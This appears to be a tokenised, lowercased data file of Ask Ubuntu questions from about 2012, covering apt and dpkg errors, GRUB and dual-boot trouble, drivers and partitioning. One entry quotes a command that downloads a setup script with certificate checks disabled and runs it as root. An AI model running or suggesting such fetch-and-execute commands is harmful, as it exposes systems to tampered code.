//extras.ubuntu.com precise/main translationindex hit http : //tr.archive.ubuntu.com precise/restricted translation-en hit http : //tr.archive.ubuntu.com precise/universe translation-en hit http : //tr.archive.ubuntu.com precise-updates/main translation-en hit http : //tr.archive.ubuntu.com precise-updates/multiverse translation-en hit http : //tr.archive.ubuntu.com precise-updates/restricted translation-en hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex hit http : //security.ubuntu.com precise-security/restricted sources hit http : //security.ubuntu.com precise-security/universe sources hit http : //security.ubuntu.com precise-security/multiverse sources hit http : //security.ubuntu.com precise-security/main i386 packages hit http : //security.ubuntu.com precise-security/restricted i386 packages hit http : //tr.archive.ubuntu.com precise-updates/universe translation-en hit http : //tr.archive.ubuntu.com precise-backports/main translation-en hit http : //tr.archive.ubuntu.com precise-backports/multiverse translation-en hit http : //tr.archive.ubuntu.com precise-backports/restricted translation-en hit http : //tr.archive.ubuntu.com precise-backports/universe translation-en hit http : //security.ubuntu.com precise-security/universe i386 packages hit http : //security.ubuntu.com precise-security/multiverse i386 packages hit http : //security.ubuntu.com precise-security/main translationindex hit http : //security.ubuntu.com precise-security/multiverse translationindex hit http : //security.ubuntu.com precise-security/restricted translationindex hit http : //security.ubuntu.com precise-security/universe translationindex hit http : //security.ubuntu.com precise-security/main translation-en hit http : //security.ubuntu.com precise-security/multiverse translation-en hit http : //security.ubuntu.com precise-security/restricted translation-en hit http : //security.ubuntu.com precise-security/universe translation-en ign http : //ppa.launchpad.net precise/main translation-en_us ign http : //extras.ubuntu.com precise/main translation-en_us ign http : //ppa.launchpad.net precise/main translation-en ign http : //extras.ubuntu.com precise/main translation-en reading package lists ... done zero @ ghostrider : ~ $ sudo apt-get install oracle-java7-installer reading package lists ... done building dependency tree reading state information ... done oracle-java7-installer is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up oracle-java7-installer ( 7u3-0~eugenesan~precise4 ) ... downloading ... -- 2012-06-11 23:57:11 -- http : //download.oracle.com/otn-pub/java/jdk/7u3-b04/jdk- 7u3-linux-i586.tar.gz resolving download.oracle.com ( download.oracle.com ) ... 64.209.77.18 connecting to download.oracle.com ( download.oracle.com ) |64.209.77.18|:80 ... connected . http request sent , awaiting response ... 302 moved temporarily location : https : //edelivery.oracle.com/otn-pub/java/jdk/7u3-b04/jdk-7u3-linux-i586.tar.gz [ following ] -- 2012-06-11 23:57:11 -- https : //edelivery.oracle.com/otn-pub/java/jdk/7u3-b04/jdk-7u3-linux-i586.tar.gz resolving edelivery.oracle.com ( edelivery.oracle.com ) ... 95.101.122.174 connecting to edelivery.oracle.com ( edelivery.oracle.com ) |95.101.122.174|:443 ... connected . http request sent , awaiting response ... 302 moved temporarily location : http : //download.oracle.com/errors/download-fail-1505220.html [ following ] -- 2012-06-11 23:57:12 -- http : //download.oracle.com/errors/download-fail-1505220.html connecting to download.oracle.com ( download.oracle.com ) |64.209.77.18|:80 ... connected . http request sent , awaiting response ... 200 ok length : 5307 ( 5.2k ) [ text/html ] saving to : `./jdk-7u3-linux-i586.tar.gz' 0k ... .. 100 % 976k=0.005s 2012-06-11 23:57:12 ( 976 kb/s ) - `./jdk-7u3-linux-i586.tar.gz ' saved [ 5307/5307 ] download done . sha256sum mismatch jdk-7u3-linux-i586.tar.gz oracle jdk 7 is not installed . dpkg : error processing oracle-java7-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : oracle-java7-installer e : sub-process /usr/bin/dpkg returned an error code ( 1 ) zero @ ghostrider : ~ $
149598	how can i start busybox at boot time , from grub , or even before grub ?	most busybox questions are related to the fact that users are dropped to a busybox shell due to some unknown issues at boot time . this must make busybox one of the most hated pieces of software . my problem is the opposite . i want to deliberately start busybox at boot time either from grub , or even before grub . is this possible ? how can i do it ? the purpose is to execute some commands before the boot sequence is reinitiated . so basically i want to execute some commands to make some hardware available to the bootloader .
149599	why does dpkg give me a `` could not lock '' error even after a reboot ?	i get a dpkg is locked error even after a reboot ? ? ? i ca n't do any apt-get related commands e : could not lock /var/lib/apt/lists/lock is not available - open ( 11 : resource is temporarily unavailable ) e : the directory /var/lib/apt/lists/ not lock e : could not lock /var/lib/dpkg/lock is not available - open ( 11 : resource is temporarily unavailable ) e : can beheersmap ( /var/lib/dpkg/ ) not lock . is it in use by another process ? ( dutch ubuntu above err code has been translated with google tranlsater ) update i found the bug that caused this i added a ppa that had foxit reader ( pdf reader ) installer in its repository . the installer tries to download from a link that is dead and it continues to download it . i have no patient i ctrl-z/c/x . it then paused the installer . and then remaind locked . do as @ izx says sudo rm -f /var/lib/apt/lists/lock and then sudo dpkg -- configure -a then also sudo apt-get install -f remove the ppa from software-sources and then run in terminal sudo apt-get purge foxit-installer and just in case you want to clean everything . run these sudo apt-get update sudo apt-get autoremove sudo apt-get check sudo apt-get clean sudo apt-get autoclean
149601	is it possible to add the chrome task manager to the chrome unity quicklist ?	is it possible to add the chrome task manager to the chrome unity quicklist as an option ?
149609	how do i install ubuntu on an hp touchsmart 600 ?	i have a hp touchsmart 600 pc series . i tried to install the lastest version of ubuntu ( 12.04 lts , 64bits ) but it would not install . i popped in the cd and the menu asked for a reboot . which i did . as ubuntu was about to install ( purple background with 2 symbols underneth ) the screen was dark and a prompt kept blinking for like over 10 minutes . so i turned off my pc and loaded my window os . i ran ubuntu again and used the help install feature . needless to say the same thing happen again ! does ubuntu work on hp touchsmart computers ?
149614	how to opendns on router with dynamic ip	opendns is almost completely useless with a dynamic ip and most people have dynamic ip addresses . there is n't even a decent client for linux to update your ip . there is a script you can install but it only seems to update on startup and all my child needs to do is unplug and replug the cable from the wall or router and a new ip is created totally killing the opendns service . i 'm not even sure the mac or windows ip update clients can protect from such a simple maneuver . how can i get my ip address to constantly update with opendns , is my question . we have several computers connected to the same wireless router . i have entered the correct setup for the router but i need something to update the dynamic ip .
149616	ubuntu software center is crashing while trying to install psychonauts	i am having a problem installing tim schafers epic platform video game psychonauts trough the ubuntu software center . i have bought the game on http : //www.humblebundle.com/ and i have used the new redeem option introduced in this bundle : `` redeem your bundle on the ubuntu software center . '' when i have downloaded approximately 2.1 gb of psychonauts then ubuntu software center starts to repeatedly crash and pop-up with a new crash report dialog every few seconds ( before previous ones are closed and that will crash the computer after a few min , unless i stop the download ) . i also have a file-size bug , where ubuntu software center tells me that i have downloaded 880,2 mb out of 133,3 mb i use the new ubuntu 12.04 lts and ubuntu software center version 5.2.2.2 ( âš2009-2011 canonical < -- - that is also a bug , should be 2012 i guess ) i hope someone can help me .
149617	how do i install the macbuntu theme on ubuntu 11.10 ?	i have downloaded macbuntu , extracted it inside the downloads folder , and opened the terminal , i do n't know how to edit or anything . how do i install the macbuntu theme on ubuntu 11.10 ?
149618	mouse stopped working after new installation 12.04	i just installed 12.04 fresh on my pc but now my mouse is not working ( logitech ex110 cordless ) . my keyboard is working fine , but my mouse is non-responsive . before i had ubuntu 10.04 and everything worked fine in there . i tried the solutions posted here but none of done work for me . could anyone help me out here ?
149622	how do i get an application to display on a `` dummy monitor '' ?	i have a gtk program ( transmission-gtk ) which i would like to run from a console in one of the virtual terminals ( over ssh , and locally ) . is there a way to get this application ( or any other gtk application , for future reference ) to display to a dummy monitor instead of erring about this ? note that i do not want to use a cli version -- not all gtk programs have cli versions .
149623	upgraded to xfce 4.10 , keyboard media keys no longer work	i 've been looking for a solution for this all night , to no avail . i did a dist-upgrade from the xubuntu default xfce 4.8 ( ? ) where the keys for controlling the system volume worked perfectly . now , i have no idea what to do to fix this .
149626	first timer struggling to install wubi	i 'm trying to use ubuntu for the first time here . trying to install 12.04 using the wubi file ( following these instructions : http : //www.ubuntu.com/download/help/install-ubuntu-with-windows ) , but at step 7 ( the end ) , when i select ubuntu the screen glitches out , shows a bunch of twitching colours , and then the screen goes to black and the computer stops responding . i do n't really know what i 'm doing and have no idea how to fix this so any help would be greatly appreciated ! my computer is currently using windows 7 , acpi x64-based pc , amd radeon hd 6670 , acer al1916w monitor .
149627	how do you enable multi-touch for lubuntu 12.04 on my hp mini trackpad ?	i have an hp mini 110 with a multi touch trackpad . i have lubuntu 12.04 installed . i ca n't right click to save my life .
149628	brother mfc-j435w wireless scanning issue	thanks for taking the time to read this . i have a brother mfc-j435w and i was able to get the printer set up for wireless printing , but it is not allowing me to scan wirelessly . it gives me the message to `` check connection '' . i 'll tell you what i 've done so far and maybe someone can help me out . i 've installed the scanner driver and scan tool i installed xsane ( to see if it would allow the scanner to communicate with the computer and that did n't help ) . i 've tried restarting the computer . after those things i am now at a loss as to where to go from here . any help would be great . thanks . i 've also searched for this question in the brother faq as well as on here and i have n't found an answer . thanks again .
149629	how do i prevent iptables from loading on boot ?	i do n't need iptables on my computer , since i 'm behind a nat server and a router . i , therefore , flushed all the rules i had left to disactivate the firewall . i 'm wonder if i could probably prevent iptables from starting on boot as well . my first trial was do blacklist all modules related to it on /etc/modprobe.d/blacklist.conf , which were all together ip6table_filter , ip6_tables , ip6table_filter , iptable_filter , ip_tables , iptable_filter and x_tables . but it did not worked out . my question is how can i avoid iptables to get loaded at startup ?
149630	blank screen when booting from usb drive	here is what i have done : i downloaded the iso `` ubuntu-12.04-desktop-amd64 '' i used universal-usb-installer-1.9.0.0 to make a bootable usb drive . i restarted pc and changed the boot option to usb hdd . i got a menu to : boot from usb install to hard drive help etc when i click boot from usb or install to hard drive , loads of text flies past and then i get a blank screen and i ca n't see anything . what can i do so i can see the installation screen ? i 'm using a dual monitor setup from my gfx card and my main display is on my hdmi port to my tv .
149632	ubuntu no boot logo	when i used the exe file to install it it works on first start . then when i restart it and boot from it , i get a purple screen then it flashes to the login screen what happend to the ubuntu logo ?
149639	how to eliminate guest session ubuntu 12.04	hello everyone i have a problem with the guest session ... i turned on inadvertently and that started the problems ! how can i disable it because i do not need ... i read on google that typing on terminal sudo gedit /etc/lighdm/lightdm.conf i should be able to access the removal of the guest session and instead i get the message sorry , try again . ( sudo ) password for antonio : how do i do ? is something wrong ? thanks in advance and excuse my inexperience ... ..
149651	how do i setup pointer-keys/mouse-keys in lubuntu ? ( move cursor with num-pad keys )	i know there is an easy way to set up mouse emulation with the numpad in xubuntu and ubuntu . is there an easy way to do so in lubuntu ? is there a config file that can be edited , or does a program need to be installed ?
149652	screen brightness in ubuntu not working	hardware : hp dvd6t , amd radeon 6700 os : natty 32-bit . i have researched a lot on this and basically most of the solutions that are on the internet / stackexchange revolves around the brightness buttons not working . if you are brightness buttons are not working then you can do a million things to get it work i ) install applets ii ) modify /etc/brightness file iii ) write scripts to modify brightness . however , my problem is not brightness buttons , but the brightness delivered by the video driver itself . my brightness is set to 0 , but still actual_brightness shows 5 i 'd like to add that i use a 32-bit os and the drivers usually come on 64-bits .
149654	any easy way to have ubuntu remount all currently mounted devices on reboot ?	any easy way to have ubuntu remount all currently mounted devices on reboot ? i know that i can add the entries to fstab , but i would prefer a method that would just `` remember '' what i currently have mounted and mount them back on reboot ( and not mount any devices that have been unmounted not in fstab ) is there any particularly simple way to do this ? otherwise i 'm considering writing a script for login/logoff say i normally have `` permanent '' mounts ( in fstab ) like /dev/sda1 - > / /dev/sdb1 - > /tmp /dev/sdc1 - > /folder and i decide to mount the following /dev/sda2 - > /mnt/sda2 smbmount //server/share - > /mnt/server can i get the last two to automount next time i login / after i reboot ?
149659	playlists on android phone	i have a serious problem with the ubuntu music players . i 'm at the point where i 'm going to switch back to windows because i ca n't figure this out and nobody seems to be able to help . if anybody knows how to transfer playlists from clementine a microsd for my android phone , i would appreciate it if they told me how to do it . i use clementine , but i have n't been able to do this with rhythmbox either . people seem to think that i want to transfer the individuals files to my phone , but that 's not the case . i have a playlist for each genre of music . for instance , i have a rock music playlist , a dance music playlist , an electronic music playlist , etc . i have these playlists on my computer in clementine . i would like to put the playlists that i 've designed in clementine on my android phone . i 'm sure some ubuntu user has managed to do this , as this is a simple thing that apple and windows users do easily all the time . i have tried copying and pasting .xspf playlists to my microsd card , but the songs do n't transfer , although the playlist titles do . i have also copied songs onto my microsd card , but they are not in a distinct playlist . please help me put playlists on my phone . itunes does this easily . this has to be much easier than it has been for me .
149661	`` pointers '' with $ syntax in /etc/environment	is it valid to have `` pointers '' in /etc/environment using $ foo syntax ? right now my /etc/environment looks like this : java_home=/usr/lib/jvm/java-6-openjdk maven_home=/usr/bin/apache-maven/apache-maven-3.0.4 m2_home= $ maven_home m2= $ maven_home/bin path=/bin : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : $ java_home/bin : $ maven_home/bin i 'm not getting the results that i 'm expecting though : ~ $ echo $ java_home /usr/lib/jvm/java-6-openjdk ~ $ echo $ maven_home /usr/bin/apache-maven/apache-maven-3.0.4 ~ $ echo $ path /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin/bin : /usr/games : $ java_home/bin : $ maven_home/bin
149667	create option to load ubuntu or windows 7 at start-up	we have a new dell optiplex 790 desktop with windows 7 and just installed ubuntu 12.04 on it using a usb stick that was configured as a boot drive . we created a new partition for ubuntu during installation using the partition editor that comes up during installation . everything seems to have gone fine with the installation except that , unexpectedly , there is no option to boot up ubuntu when the computer is started . we just start the computer and windows starts up with no option to ever start ubuntu . the only way we have gotten ubuntu to start is by putting the usb stick used for installation back into the computer and having the computer boot from it . then grub shows up and the ubuntu os that we installed starts up ( rather than the live-cd version on the usb stick ) . previous times we have installed ubuntu , grub shows up when we start the computer and we can choose among the various oses installed . can anyone suggest what to do ? we want to have the option to launch either windows 7 or ubuntu 12.04 when we start the computer , with the default being windows 7 . right now there is no option and windows 7 just starts the way it did before we installed ubuntu . note that if we hit f1 soon after starting the computer , we get some sort of windows bootloader ( not sure of exact name ) but there is no option for ubuntu ; just windows 7 . also note that if we hit the shift key soon after starting the computer , as some help pages have suggested , nothing happens ( windows 7 is loaded as usual ) . thanks in advance !
149669	webpages not loading in 12.04	after upgrading to ubuntu 12.04 lts browser ( firefox , chrome ) does not load webpages . connection to the network works and also to the internet ( skype is working ) software installaion via sudo apt-get fails ( -5 hostname association ... )
149671	i have a global .gitignore but files are n't being ignored , why ?	i have a .gitignore_global in my home directory durrantm ... /durrantm $ pwd /home/durrantm durrantm ... /durrantm $ ls .git* .gitconfig .gitignore_global the .gitignore_global has : durrantm ... /durrantm $ head .gitignore_global # rubymine # .idea/ # compiled source # # # # # # # # # # # # # # # # # # # # *.dll *.exe # logs and databases # # # # # # # # # # # # # # # # # # # # # # # but when i git status for a project i still end up getting the .idea files when i start using rubymine . so my git status still shows this : # modified : .idea/datasources.xml # modified : .idea/linker.iml # modified : .idea/misc.xml # modified : .idea/workspace.xml i have run git config -- global core.excludesfile ~/.gitignore_global bvut it did n't help .
149674	how to create or recover windows bootloader after deleting ubuntu boot drive	i have a computer that dual-boots ( or tri-boots ) windows 8 release preview , windows 7 , and ubuntu 12.04 . grub boots between windows 8 and ubuntu ; for which i use primarily . recently , i decided to remove ubuntu , as i hardly used it . i deleted the ubuntu partition accidentally before replacing the grub bootloader . now , whenever i want to boot the machine , it gives me the `` grub-rescue '' prompt -- i am unable to boot into either windows ( 8 nor 7 ) , nor ubuntu ( except via usb , of course ) . i do not have any windows 7/8 recovery media , so that is n't an option . please note that after i deleted the ubuntu partition , i put the pc into hibernate , and then turned it on . this means the c : \ [ windows 8 ] drive can not be mounted . i do n't know if that is bad , but it definitely does n't make things better . i am currently booting ubuntu via usb , in an effort to restore the windows bootloader . i have looked into using boot-repair to solve the problem using the instructions here , although after attempting to apply the changes , it gave the error : `` please install the [ mbr ] packages . then try again . '' i do n't know why i 'm getting this error ; is there a way to install the 'mbr packages ? ' i honestly do n't know what exactly they are , nor how to install them . are there any other options i have not yet exhausted to be able to boot back into windows , in the case that there is a better way ? i want to set the bootloader to boot into windows 8 , but booting into either windows 7 or 8 is fine ( i can use easybcd from there ) . is there a simple solution to this ? i 've checked bios , and i have n't been able to find a way to boot into windows .
149680	can you use an sd card for swap in ubuntu 12.04 ?	i had a smallish ( 4gb ) sd card laying around and i was wondering if it 's possible or advisable to use it as swap space . ideally , i 'd like to free up some hard drive space by removing the swap on it and solely using the sd card but if that 's not possible/advisable i 'd be just fine with having a little extra .
149687	kubuntu problem when installing - metalink unable to download therefore iso	i installed ubuntu with no errors , when i try to install kubuntu using wubi.exe i get this : an error occured : can not download the metalink therefore the iso for more information please see the log file : c : \users\dell\appdata\local\temp\wubi-12.04-rev265.log any suggestions on how to fix this problem ?
149691	how to put `` gnome-panel '' like icons in gnome 3 ?	i ca n't put icons on my gnome-panel ( i mean the right click on the panel does n't works , and i can drag & drop icons from my desktop to my gnome-panel ) : $ dpkg -l | grep -i gnome-panel ii gnome-panel 1:3.2.0-0ubuntu1 launcher and docking facility for gnome ii gnome-panel-data 1:3.2.0-0ubuntu1 common files for the gnome panel why ? what can disable it ? ? how can i enable this standard feature ? i 'm using ubuntu 11.10
149692	iso file not recognized by win7 or pendrive installer	when i follow the cd instructions from ubuntu win7 gives `` selected disk image is n't valid '' and pendrive installer does n't see the .iso file . i can see it with windows explorer . any ideas ?
149695	i have found a bug -- how do i know which to report to ?	i have found a bug with a few applications such as gimp 2.8 and tuxguitar on 12.04 . whenever i start the application , its icon will not appear on the alt-tab switcher and it will not appear on the launcher . but , pinning the application to the launcher and then loading the program will allow the icon to be on the switcher . here is my question : should i report this bug to unity or to gimp/tuxguitar ?
149696	no c++ option after install eclipse cdt	i used terminal to install eclipse with jdk7 , and now i want to incorporate c/c++ development , so i installed a compiler ( gcc 4.7 ) and and eclipse cdt plugin from the terminal : sudo apt-get install eclipse-cdt but when i restarted eclipse and tried to change the perspective , there was no c++ option i can not even create a new c++ project . someone suggested that i do `` install new software '' and choose the cdt from the hard drive . if this is what i should do , where does terminal install its files to ?
149700	how to turn an administrator user account into a standard one ?	i have two administrator user accounts , and i need one of them to turn the other into a standard account . how do i do that ?
149702	mysql ubuntu noinstall	i am looking for mysql `` no-install '' version for ubuntu . i can successfully run mysql on windows ( using msi installer as well as no-install ) . with ubuntu , mysql got installed using the software center . my question is -- where do i find mysql no-install version for ubuntu . googled for it , but could not find the same . regards , vineet
149707	is there a desktop weather app ?	is there any weather app that works with ubuntu 12.04 ? i tried many of them including the screenlets . nothing seems to work .
149711	how to do end task similar to that in windows ?	sometimes ubuntu freezes and i have no other option than to power off system directly . is there some remedy or way like 'ctrl + alt + del ' similar to that in windows . that would be very helpful ... .. i need a way out other than option to directly power off my system in times of gross failure . shutting down this way always creates fear crashing down my system or losing some data which is unacceptable .
149719	ubuntu keeps freezing . how do i reinstall ubuntu 12.04	i have a desktop computer running the latest version of ubuntu 12.04 . but it keeps freezing after 2-3 minutes . how can i erase the disk and reinstall ? ( i already saved all i needed information that i like to keep ) . can i boot from a usb key ? i have access to another computer for download .
149720	prompted to type password ( for installation purpose ) after i removed my password . what to do ?	i just installed ubuntu and one of the 1st things that i did was - remove my password . i went into settings - > user accounts , clicked on the unlock icon and changed the password to nothing , made it so it does n't require me to log in , but yet , when i try to install some software i get prompted to type in my password . i tried using nothing and my old password - neither of them work . what should i do to fix this ? do i really have to re-install ubuntu ?
149728	python : regex filter ids divisible by 3	hi i have a list of ids separated with commas and i need to take the ids which are divisible to 3 .
149738	empathy resets my google account after restart	i currently work on a ubuntu 12.04 precise pangolin . there is a small annoyance with empathy though . every time i log out , empathy just resets my google talk account settings , so i have to login after every time . is there a way or setting to handle this small problem ?
149741	getting error while running this command sudo apt-get install curl git-core	after running the command to install ruby sudo apt-get install curl git-core i am getting an error- e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? please tell me the solution for it..
149744	compiz settings manager problem	i installed the compiz settings manager , to try out some effects . but after installation i felt something unuseful and dragging the system speed.so , thought of removing the app . using terminal . and this is what happened the terminal and other applications take large amount of time to get opened , maximized , minimized , closed . removed the settings manager , still the problem exists .
149745	system freeze after adding noapic acpi=noirq nolapic	i have an issues on which your expert knowledge is required so that i can solve it , here is the scenario : [ problem was ] sticky mouse after installation ! to solve this issues i did following procedure : gksudo gedit /etc/default/grub added noapic acpi=noirq nolapic to the end of cmd_linux_defualt line ran : sudo update-grub and rebooted . this solved my sticky mouse problem . after that , i installed a mobile broadband , connected it and the connection was established . i opened firefox and probably after 3 or 5 mins , the system froze down . i rebooted it . now the mobile broadband connection option had disappeared from menu . the problem is : how do i configure ubuntu so that it does not freezes on using mobile broadband via usb port ? p.s . i have recently switched from microsoft os to linux ubuntu your kind opinions will highly be appreciated . regards ,
149747	my primary domain controller does not work with other laptop	i have configured my primary domain controller in ubuntu 11.10 . to make sure that it worked , i used a windows 7 client in my friend laptop and i can successfully log in as a user from my domain . but when i try to test another laptop it failed with this notification . an active directory domain controller ( ad dc ) for the domain '' mydomain '' could not be contacted . ensure that the domain name is typed correctly . if the name is correct.click details for trouble shooting information . what 's wrong ? i configured the failed client same as the client that was success , and i typed the domain in correctly .
149748	need to upgrade old ubuntu and forgotten password	i am using a eeepc 901 bought 2 years ago . i had to go back to windows laptop for work reasons so i stopped using it for the last 18 months . since then , i have forgotten all passwords . i now want to upgrade from the old ubuntu . i am not even sure if it is 8 or 9 . i am not concerned by any loss of data since all my documents are so old .
149754	how would ubuntu work on an apple retina display ?	apple has announced a laptop with `` retina display '' = 2880x1800 pixels resolution on 15 inches . if one were to load ubuntu on such a machine , it would probably be unreadably micro-texted as long as ubuntu treats one pixel as one pixel . would it be possible to adjust ubuntu to use such a display in a meaningful way ? difficult ? easy ?
149755	no graphics after installing amd catalyst 12.4 and installing the recommended updates afterwards	some days ago , i installed ubuntu 12.04 . since i wanted to use dualview using an external display i installed the propriatary amd catalyst 12.4 . the graphics are fine , but if i run the updates found by the updates manager , ubuntu wo n't be able to start with graphics after reboot . i installed ubuntu 3 times until i realized what the problem was . so now i got the basic installation with catalyst running but i ca n't update the system . is there any solution to this ? or can i somehow identify which update causes this ? my system is a lenovo y560 ideapad ( intel core i7 , 8gb ram , with amd radeon hd 6570m/5700 series . thank you in advance
149757	changing file permissions problem	a few hours earlier i bought a beaglebone and now i am trying to add nameserver 8.8.8.8 ( google dns ) to /etc/resolv.conf . however when i open it with vim and try to add my nameserver , it gives me e21 : can not make changes , 'modifiable ' is off . i changed permissions via chmod . ( chmod u+rx /etc/resolv.conf ) but nothing changed . i am still unable to write into resolv.conf file . what should i do ? regards
149764	how to avoid evolution adds a `` , '' when pressing alt ?	i have an annoying problem . every time i want to enter a mail adress in evolution , it adds a `` , '' when pressing alt ( needed to type `` @ '' ) . so , when i want to send a mail to info @ ubuntu.com , it gives me : info , @ ubuntu.com which of course does not work . i can adjust it manually though but it keeps being annoying
149768	mark a deb package as used , so it 's not suggested for autoremoval	i have a bunch of shared libs installed on my system which are n't dependencies of some concrete package but are needed for non-apt-managed libraries i 've built from source ( like latest sdl , allegro , sfml , ... ) and other software built from source . the problem is that those libraries are seen by apt as unused , and are therefore candidates for auto-removal , and those get mixed up with legitimate unused packages that are free to remove . is there a way to mark packages as used so that they are not suggested for auto-removal ? my first thought was to build my own metapackage just to hold the dependencies ( like for example ubuntu-desktop is ) , but i do n't know how to do that .
149778	what is the best way of testing ubuntu on my computer ?	i 'm a little confused as to whether i should install ubuntu on its own partition on my hard drive , use virtualbox or another virtualization package to install it , or use wubi to install it directly on top of my current os ( win 7 ) . i definitely want to learn and use ubuntu , so this is not just for playing around with it . also , if i choose to partition , should i partition the hard drive myself or should i let the ubuntu installation menu do it for me ? i understand that i am going to need a main partition , for ubuntu 's core components , and also a swap partition . then there is the option to add a partition for `` home '' - i do n't understand what combination of these partitioning options i should choose , or whether it is better to partition in windows before i install ubuntu or just partition my hard drive when i install ubuntu itself
149781	how to uninstall the following ?	i 've used the following : - cd wget -- no-check-certificate -o autodl-setup http : //sourceforge.net/projects/autodl-irssi/files/autodl-setup/download sudo sh autodl-setup to : - install nginx install rutorrent with multi-user support ( http and https ) install 1st party rutorrent plugins install an encrypted ftp server ( vsftpd ) install rtorrent with xmlrpc-c support install the irc auto downloader plugin ( autodl-irssi ) install webmin install a startup script for rtorrent and irssi as suggested by this web page . how do i uninstall all of that ? ps : i 've install these `` once and a half '' ( one complete installation , and another uncompleted one ) .
149784	ad-hoc network ( hot spot ) created in ubuntu is not detected by android phone	i created a hot spot via network > wireless > use as hotspot . other laptops successfully detected the hot-spot , could connect and use it without any problem . but no android phone could detect it. ! i tried with many android phones but none could . ( i found out that even an ad-hoc created in windows is not detected by any phone ) so is there anything wrong i am doing ( rather i am not doing anything actually other than clicking on the `` use as hotspot '' button..but still.. ) ? or is that the network can not be shared with phones ? and if not , how can i share it with phones ?
149790	why does my update manager keep crashing and apt-get segfaulting ?	whenever update manager goes to check for updates - when done both manually and automatically - update manager crashes , and when i go to report the error , apport crashes too ( apport also crashes when i try to report errors from other processes ) . also , when i use apt from the command line to install programs , it stops while reading the package lists , and says : segmentation fault ( core dumped ) . solvedi copied the apt subsystem out of my other ubuntu install - works perfectly now . i guess one of the package lists was corrupt , so that was causing the segmentation fault . could probably have achieved the same results by deleting the package lists in /var/lib/apt/lists , but i was bored > _ >
149793	lightspark in firefox does n't show up	i have installed lightspark flash player alternative from what is called the official ppa : https : //launchpad.net/~sparkers/+archive/ppa ( i mean , i added this repository and then sudo apt-get install lightspark ) . but firefox does n't feel it . it looks exacly like when i had n't installed lightspark . in `` firefox - > addons - > plugins '' there is no new entry . what should i do to really use lightspark after installing it ?
149797	what does admin-secret mean in juju config file for ec2 environment	what does admin-secret means in juju config file for ec2 environment . and how can i retrieve it from aws . also what does control-bucket means , it says about s3 . but how can i get the key ?
149798	how can i convert idx/sub dvd subtitles into a text srt subtitle file ?	i have a pair of .idx/.sub subtitle files with multiple languages and i need to convert them to single-language .srt files because neither totem nor gnome mplayer can show that type of subtitles .
149805	upgrade or replace a wubi installation ?	i 've got windows 7 with wubi 11.10 installed . i would like to upgrade to 12.04 but i 'm not sure what the best path would be . i 'm not skilled enough to use ubuntu all the time , and my iphone requires me to run some windows version for the damn itunes software . i would love to run windows xp but i ca n't figure out how to install it via usb -- my computer has no cd drive . i 'd like to run windows xp and wubi 12.04 on top of that . or , perhaps , ubuntu 12.04 natively and windows xp alongside of that . so i guess i have 2 questions : ( lazy ) should i upgrade my wubi from inside ubuntu , or should i remove wubi 11.10 from within windows and install a brand new wubi 12.04 ? ( proper ) how can i install windows xp and ubuntu 12.04 alongside each other ? update : i am going to create a separate question post about the above # 2 question ... i realize it 's wrong to ask two questions in one post when they are that different .
149809	how can i have sound output before logging in ?	i have a machine ( ubuntu 11.10 ) that i would like to have it play audio ( typically through an amplifier ) , but the machine should be headless ( where its final placement will be ) . i will control what is played through ssh . however , there is no sound output until i login to the graphical console . at first i thought it was an issue with pulseaudio , so i promptly removed it to use the default alsa , but i have the same issues . i ssh to the machine , i run alsamixer and get the typical can not open mixer : no such file or directory error ( while /proc/asound/cards display correctly what i have ) . if i login on the graphical console , alsamixer works fine in the ssh session , and i have sound output . i logout , and then alsamixer stops working . so something runs ( xsession perhaps ? ) when i login that enables sound output , and gets disabled when i logout . i remember in older versions of ubuntu , there was a drum roll when the machine showed the login screen ; that is not the case anymore . perhaps if i somehow can enable that drum roll , i 'll have fixed my problem too . in any case , the question i ask is what the title says . update : issue still unsolved . i just wanted to note the information that sound is configured correctly and enabled whether i log in to a gnome or a xfce environment , and de-configured and disabled when i log out .
149814	how to delete kernel entries in the grub 2 menu whose kernels are removed ?	i executed the shell script given in how do i delete kernels from a server ? . it deleted old kernels but not their associated kernel entries in the grub 2 menu . for example , the shell script did not remove the grub 2 entry »ubuntu , mit linux 3.2.0-24-generic ( wiederherstellungsmodus ) ( on /dev/sda8 ) « and »ubuntu , mit linux 3.2.0-14-server« .
149819	flash player keeps crashing in firefox with ubuntu 12.04	i am new to ubuntu and the last few weeks my flash player keeps crashing every time i want to watch a video . it all started when i tries to fix a problem where all of my videos were blue an strange . please help me
149821	my disk already has 4 primary partitions , how can i install ubuntu ?	i would like to install ubuntu alongside windows 7 on a hp g62 notebook . although i have installed ubuntu in a dual-boot many times before , i found out that this model has already four partitions . partitions : system ( ntfs , 199mb , used 66.59mb ) partition without any tag : ntfs ( 579gm , used 129gb ) recovery ( ntfs 16.74 gb , used 2.42gb ) hp_tools ( fat32 , 103.34 mb , used 13.23mb ) since i am not an expert with partitions i would like to get advice on how to do this . my first idea is this one : free some space from /dev/sda2 ( i do n't know if could also free some other space ) delete the hp_tools partition ( i have already created a backup ) create an extended partition with the free space in # 1 containing three parititions : swap ( 1gb ) ; / ( ext4 , 30gb ) ; /home ( ext4 , 120gb ) another option is to use wubi instead . what do you think ? is there any other way to achieve this ? ps : i really think this hp policy of using 4 partitions is not a coincidence ps : i tried using gparted from the live cd and i got a warning message saying that if i freed some space from /dev/sda2 i could create serious issues in the system
149839	how do i burn a dvd with more than 3.8 gb data ?	i use kubuntu 12.04 with kde 4.8.3 and wodim / genisoimage 1.1.11 , but the problem is on ubuntu ( with brasero ) and occurred in oneiric as well . whenever i try to burn more than 3.8gb ( approaching the 4 gb limit ) of data onto a dvd , burning fails , aborts , or gives an `` error 254 . '' i have lost more than 50 dvds this way until i learned about the 3.8gb limit . anything under 3.8gb burns fine , and dvds burned with more than 3.8gb have usable data up to 3.8 gb , but then the remaining data is garbled , unaccessible , or the disk is just not recognized . i 'm pretty certain this is related to the replacement of cdrecord / mkisofs with wodim /genioimage ( which is a problem that has been described for years ) . is there another answer or fix ? re-installing cdrtools/cdrecord/mkisofs in oneiric and precise has become a herculean task .
